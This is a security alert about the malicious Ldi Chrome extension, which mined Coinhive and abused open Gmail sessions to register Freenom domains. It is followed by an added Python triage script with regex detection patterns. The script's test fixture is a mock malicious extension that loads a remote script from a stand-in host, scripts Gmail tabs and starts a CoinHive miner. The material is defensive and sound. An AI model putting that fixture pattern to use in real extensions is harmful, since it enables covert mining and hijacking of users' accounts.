Malicious Chrome Extension Injects Coinhive Miner and Uses Victim’s Gmail Account to Register Domain Names

Bleeping Computer founder Lawrence Abrams discovered a malicious Chrome browser extension named Ldi that, once installed, connects to a remote host to retrieve a script that executes commands in the victim's browser. The script loads the Coinhive cryptocurrency miner and, if the pages are already open in that instance of Chrome, uses the browser's existing sessions to act on the victim's Facebook and Gmail accounts. How the Facebook account is used is currently unknown; the Gmail account is used to register multiple domain names through Freenom, a free domain registry based in the Netherlands. Freenom completes a registration only after a confirmation link sent to the victim's Gmail account is opened, so Ldi watches the inbox for that email and opens the link automatically. Details of the registered domains are then transmitted to a command-and-control (C2) server. Ldi was promoted through compromised websites that redirected visitors to its Chrome Web Store listing; the extension has since been removed from the store, and the number of affected victims is currently unknown.

The NJCCIC assesses with high confidence that profit-motivated threat actors will increasingly take advantage of readily available in-browser cryptocurrency mining scripts to generate revenue by embedding the mining code in compromised websites, online advertisements, and browser extensions.

The NJCCIC recommends exercising caution when installing browser extensions and monitoring system CPU usage for sustained spikes after an installation. Promptly remove any extension that behaves erratically or inexplicably consumes system resources. Additionally, consider installing a reputable ad-blocking and/or script-blocking extension. Network administrators may want to consider blocking inbound and outbound connections to known C2 IP addresses and domains.
More information about this malicious extension, including indicators of compromise, is available on the Bleeping Computer website.
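The behaviours described above (broad tab access, a remotely fetched script, dynamic code execution, a Coinhive miner, and interest in an open Gmail tab) all leave static traces in an unpacked extension. The following triage script is an added example, not code from the alert, Bleeping Computer, or the Ldi extension: it reads an extension's manifest and JavaScript, flags those traces with simple heuristics, and rolls them up into the behaviours the alert describes. The sample extension contents, the permission list, and the regexes are constructed assumptions for illustration; expect false positives on legitimate extensions that also fetch remote resources.

```python
"""Static triage of an unpacked Chrome extension for the behaviours described in the
alert: broad tab/host permissions, remote script loading, dynamic code execution,
in-browser mining indicators, and references to webmail/social sites.
Added example; the sample extension contents below are constructed, not Ldi's code."""
import json
import os
import re

# Permissions that let an extension read or script arbitrary open tabs, which is what
# it would need to drive an already-open Gmail session. Triage heuristic (assumption),
# not Chrome's own risk model.
RISKY_PERMISSIONS = {"<all_urls>", "tabs", "cookies", "webRequest", "webRequestBlocking",
                     "webNavigation", "*://*/*", "http://*/*", "https://*/*"}

# (finding label, regex over extension JavaScript). Heuristics; expect false positives.
CODE_INDICATORS = [
    ("remote_script_load", re.compile(r"(?:\.src\s*=\s*|importScripts\(|fetch\()[^;]*https?://", re.I)),
    ("dynamic_code_exec", re.compile(r"\beval\(|new\s+Function\(|executeScript\([^)]*\bcode\s*:", re.I)),
    ("coinhive_miner", re.compile(r"coinhive|\.Anonymous\(|miner\.start\(", re.I)),
    ("mining_websocket", re.compile(r"wss?://[^\s'\"]+/proxy", re.I)),
    ("webmail_or_social_target", re.compile(r"mail\.google\.com|facebook\.com", re.I)),
]


def load_unpacked(directory):
    """Read manifest.json and every .js file below an unpacked extension directory
    (for example one version folder under Chrome's profile Extensions directory)."""
    files = {}
    for root, _, names in os.walk(directory):
        for name in names:
            if name == "manifest.json" or name.endswith(".js"):
                path = os.path.join(root, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(path, directory)] = fh.read()
    return files


def triage_extension(files):
    """files: {relative path: text}. Returns a list of (path, label, evidence)."""
    findings = []
    try:
        manifest = json.loads(files.get("manifest.json", "{}"))
    except json.JSONDecodeError:
        manifest = {}
        findings.append(("manifest.json", "unparseable_manifest", ""))
    requested = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for script in manifest.get("content_scripts", []):
        requested |= set(script.get("matches", []))
    for perm in sorted(requested & RISKY_PERMISSIONS):
        findings.append(("manifest.json", "risky_permission", perm))
    for path, text in files.items():
        if path.endswith(".js"):
            for label, pattern in CODE_INDICATORS:
                for match in pattern.finditer(text):
                    findings.append((path, label, match.group(0)[:60]))
    return findings


def classify(findings):
    """Collapse individual findings into the behaviours the alert describes."""
    labels = {label for _, label, _ in findings}
    tags = []
    if labels & {"coinhive_miner", "mining_websocket"}:
        tags.append("in-browser miner")
    if {"remote_script_load", "dynamic_code_exec"} <= labels:
        tags.append("remote-controlled")
    if "webmail_or_social_target" in labels and "risky_permission" in labels:
        tags.append("session abuse")
    return tags


# Constructed sample mimicking the alert's description; not the real extension's code.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 2, "name": "Sample Helper", "version": "1.0",
        "permissions": ["tabs", "<all_urls>", "storage"],
        "background": {"scripts": ["background.js"]},
    }),
    "background.js": "\n".join([
        "var s = document.createElement('script');",
        "s.src = 'https://example.invalid/loader.js';  // remote stage-two script",
        "document.head.appendChild(s);",
        "chrome.tabs.query({}, function (tabs) {",
        "  tabs.forEach(function (t) {",
        "    if (t.url.indexOf('mail.google.com') !== -1) {",
        "      chrome.tabs.executeScript(t.id, {code: 'document.body.innerHTML'});",
        "    }",
        "  });",
        "});",
    ]),
    "miner.js": "\n".join([
        "var miner = new CoinHive.Anonymous('SITEKEY', {throttle: 0.2});",
        "miner.start();",
        "var ws = new WebSocket('wss://example.invalid/proxy');",
    ]),
}

# Constructed benign control: one narrow permission, no indicators.
BENIGN_EXTENSION = {
    "manifest.json": json.dumps({"manifest_version": 2, "name": "Notes", "version": "1.0",
                                 "permissions": ["storage"]}),
    "popup.js": "document.getElementById('out').textContent = 'hello';",
}

if __name__ == "__main__":
    for path, label, evidence in triage_extension(SAMPLE_EXTENSION):
        print(f"{path:14} {label:26} {evidence}")
    print("classification:", classify(triage_extension(SAMPLE_EXTENSION)))
```

To triage a real installed extension, point `load_unpacked` at a version folder under the Chrome profile's Extensions directory and pass the result to `triage_extension`. The findings are a starting point for manual review, not a verdict: a single "remote_script_load" hit is common in benign extensions, whereas the combination of broad tab permissions, remotely loaded code, and mining indicators is the pattern worth escalating.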
